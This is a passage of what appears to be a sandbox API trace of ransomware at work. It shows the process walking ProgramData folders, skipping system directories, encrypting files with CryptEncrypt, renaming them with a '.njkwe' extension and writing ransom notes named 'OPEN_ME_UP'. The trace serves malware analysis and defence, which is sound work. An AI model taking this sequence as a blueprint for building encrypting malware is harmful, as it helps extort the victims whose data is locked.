lpNumberOfBytesWritten=0x380edc4*=0xcdd, lpOverlapped=0x0) returned 1 [0074.535] GetProcessHeap () returned 0xbe0000 [0074.535] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4f858 | out: hHeap=0xbe0000) returned 1 [0074.535] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.535] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0074.535] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0074.535] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0074.535] CloseHandle (hObject=0x43c) returned 1 [0074.536] GetProcessHeap () returned 0xbe0000 [0074.536] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0074.536] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\0__Power_Policy.provxml_r00t_{3sXlE5}.njkwe") returned 137 [0074.536] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\0__Power_Policy.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\0__power_policy.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\0__Power_Policy.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\0__power_policy.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0074.537] GetProcessHeap () returned 0xbe0000 [0074.537] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0074.537] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54060701, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x54060701, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x54060701, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0xcdd, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="0__Power_Policy.provxml", cAlternateFileName="")) returned 0 [0074.537] FindClose (in: hFindFile=0xc1a2a0 | out: hFindFile=0xc1a2a0) returned 1 [0074.537] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 125 [0074.537] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0074.537] WriteFile (in: hFile=0x438, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380edcc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380edcc*=0x351, lpOverlapped=0x0) returned 1 [0074.538] CloseHandle (hObject=0x438) returned 1 [0074.538] GetProcessHeap () returned 0xbe0000 [0074.538] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0074.538] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5408696e, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x5408696e, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x5408696e, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0xfb, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0074.538] lstrcmpiW (lpString1="RunTime.xml", lpString2="Windows") returned -1 [0074.538] lstrcmpiW (lpString1="RunTime.xml", lpString2="$Recycle.bin") returned 1 [0074.538] lstrcmpiW (lpString1="RunTime.xml", lpString2="System Volume Information") returned -1 [0074.538] lstrcmpiW (lpString1="RunTime.xml", lpString2="Program Files") returned 1 [0074.538] lstrcmpiW (lpString1="RunTime.xml", lpString2="Program Files (x86)") returned 1 [0074.538] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml") returned 97 [0074.538] StrStrIW (lpFirst="RunTime.xml", lpSrch=".njkwe") returned 0x0 [0074.538] lstrcmpW (lpString1="RunTime.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0074.538] lstrcmpW (lpString1="RunTime.xml", lpString2="taridd") returned -1 [0074.538] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0074.538] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0074.539] GetTickCount () returned 0x1152fc7 [0074.539] GetTickCount () returned 0x1152fc7 [0074.539] GetTickCount () returned 0x1152fc7 [0074.539] GetTickCount () returned 0x1152fc7 [0074.539] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0074.539] GetProcessHeap () returned 0xbe0000 [0074.539] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4e850 [0074.539] ReadFile (in: hFile=0x438, lpBuffer=0xc4e850, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc4e850*, lpNumberOfBytesRead=0x380f04c*=0xfb, lpOverlapped=0x0) returned 1 [0074.540] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffff05, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.540] WriteFile (in: hFile=0x438, lpBuffer=0xc4e850*, nNumberOfBytesToWrite=0xfb, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc4e850*, lpNumberOfBytesWritten=0x380f04c*=0xfb, lpOverlapped=0x0) returned 1 [0074.540] GetProcessHeap () returned 0xbe0000 [0074.540] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4e850 | out: hHeap=0xbe0000) returned 1 [0074.540] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.542] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0074.543] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0074.543] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0074.544] CloseHandle (hObject=0x438) returned 1 [0074.544] GetProcessHeap () returned 0xbe0000 [0074.544] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0074.544] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml_r00t_{3sXlE5}.njkwe") returned 117 [0074.544] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime.xml_r00t_{3sxle5}.njkwe")) returned 1 [0074.544] GetProcessHeap () returned 0xbe0000 [0074.544] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0074.544] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5408696e, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x5408696e, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x5408696e, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0xfb, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime.xml", cAlternateFileName="")) returned 0 [0074.544] FindClose (in: hFindFile=0xc1a160 | out: hFindFile=0xc1a160) returned 1 [0074.544] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 117 [0074.544] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0074.545] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0074.546] CloseHandle (hObject=0x434) returned 1 [0074.546] GetProcessHeap () returned 0xbe0000 [0074.546] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0074.546] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d21de20, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d21de20, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d21de20, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 0 [0074.546] FindClose (in: hFindFile=0xc1a320 | out: hFindFile=0xc1a320) returned 1 [0074.546] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 112 [0074.546] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0074.548] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0074.549] CloseHandle (hObject=0x430) returned 1 [0074.549] GetProcessHeap () returned 0xbe0000 [0074.549] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0074.549] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d244069, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d26a2f7, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d26a2f7, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}", cAlternateFileName="{268C4~1")) returned 1 [0074.549] lstrcmpiW (lpString1="{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}", lpString2="Windows") returned -1 [0074.549] lstrcmpiW (lpString1="{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}", lpString2="$Recycle.bin") returned 1 [0074.549] lstrcmpiW (lpString1="{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}", lpString2="System Volume Information") returned -1 [0074.549] lstrcmpiW (lpString1="{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}", lpString2="Program Files") returned -1 [0074.549] lstrcmpiW (lpString1="{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}", lpString2="Program Files (x86)") returned -1 [0074.549] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}") returned 80 [0074.549] lstrcmpW (lpString1="{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}", lpString2=".") returned 1 [0074.549] lstrcmpW (lpString1="{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}", lpString2="..") returned 1 [0074.549] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0074.549] GetProcessHeap () returned 0xbe0000 [0074.550] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0074.550] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\*") returned 82 [0074.550] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d244069, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d26a2f7, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d26a2f7, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a260 [0074.550] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.550] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.550] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.550] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.550] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.550] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\.") returned 82 [0074.550] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.550] FindNextFileW (in: hFindFile=0xc1a260, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d244069, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d26a2f7, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d26a2f7, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0074.550] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.550] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.550] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.550] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.550] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.550] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\..") returned 83 [0074.550] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.550] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.550] FindNextFileW (in: hFindFile=0xc1a260, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53e0f327, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53e0f327, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53e3557c, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x65f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="customizations.xml", cAlternateFileName="")) returned 1 [0074.550] lstrcmpiW (lpString1="customizations.xml", lpString2="Windows") returned -1 [0074.550] lstrcmpiW (lpString1="customizations.xml", lpString2="$Recycle.bin") returned 1 [0074.551] lstrcmpiW (lpString1="customizations.xml", lpString2="System Volume Information") returned -1 [0074.551] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files") returned -1 [0074.551] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files (x86)") returned -1 [0074.551] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\customizations.xml") returned 99 [0074.551] StrStrIW (lpFirst="customizations.xml", lpSrch=".njkwe") returned 0x0 [0074.551] lstrcmpW (lpString1="customizations.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0074.551] lstrcmpW (lpString1="customizations.xml", lpString2="taridd") returned -1 [0074.551] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\customizations.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0074.551] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0074.551] GetTickCount () returned 0x1152fd6 [0074.551] GetTickCount () returned 0x1152fd6 [0074.551] GetTickCount () returned 0x1152fd6 [0074.551] GetTickCount () returned 0x1152fd6 [0074.551] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0074.551] GetProcessHeap () returned 0xbe0000 [0074.551] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0074.551] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x65f, lpOverlapped=0x0) returned 1 [0074.554] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffff9a1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.554] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x65f, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x65f, lpOverlapped=0x0) returned 1 [0074.554] GetProcessHeap () returned 0xbe0000 [0074.554] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0074.554] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.554] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0074.554] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0074.554] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0074.554] CloseHandle (hObject=0x434) returned 1 [0074.554] GetProcessHeap () returned 0xbe0000 [0074.554] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0074.555] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\customizations.xml_r00t_{3sXlE5}.njkwe") returned 119 [0074.555] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\customizations.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\customizations.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\customizations.xml_r00t_{3sxle5}.njkwe")) returned 1 [0074.555] GetProcessHeap () returned 0xbe0000 [0074.555] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0074.555] FindNextFileW (in: hFindFile=0xc1a260, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53e0f327, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53e0f327, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53e0f327, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MasterDatastore.xml", cAlternateFileName="")) returned 1 [0074.555] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Windows") returned -1 [0074.555] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="$Recycle.bin") returned 1 [0074.555] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="System Volume Information") returned -1 [0074.555] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files") returned -1 [0074.555] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files (x86)") returned -1 [0074.555] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\MasterDatastore.xml") returned 100 [0074.555] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch=".njkwe") returned 0x0 [0074.555] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0074.555] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="taridd") returned -1 [0074.555] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\MasterDatastore.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0074.555] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{268c43e1-aa2b-4036-86ef-8cda98a0c2fe}\\MasterDatastore.xml" 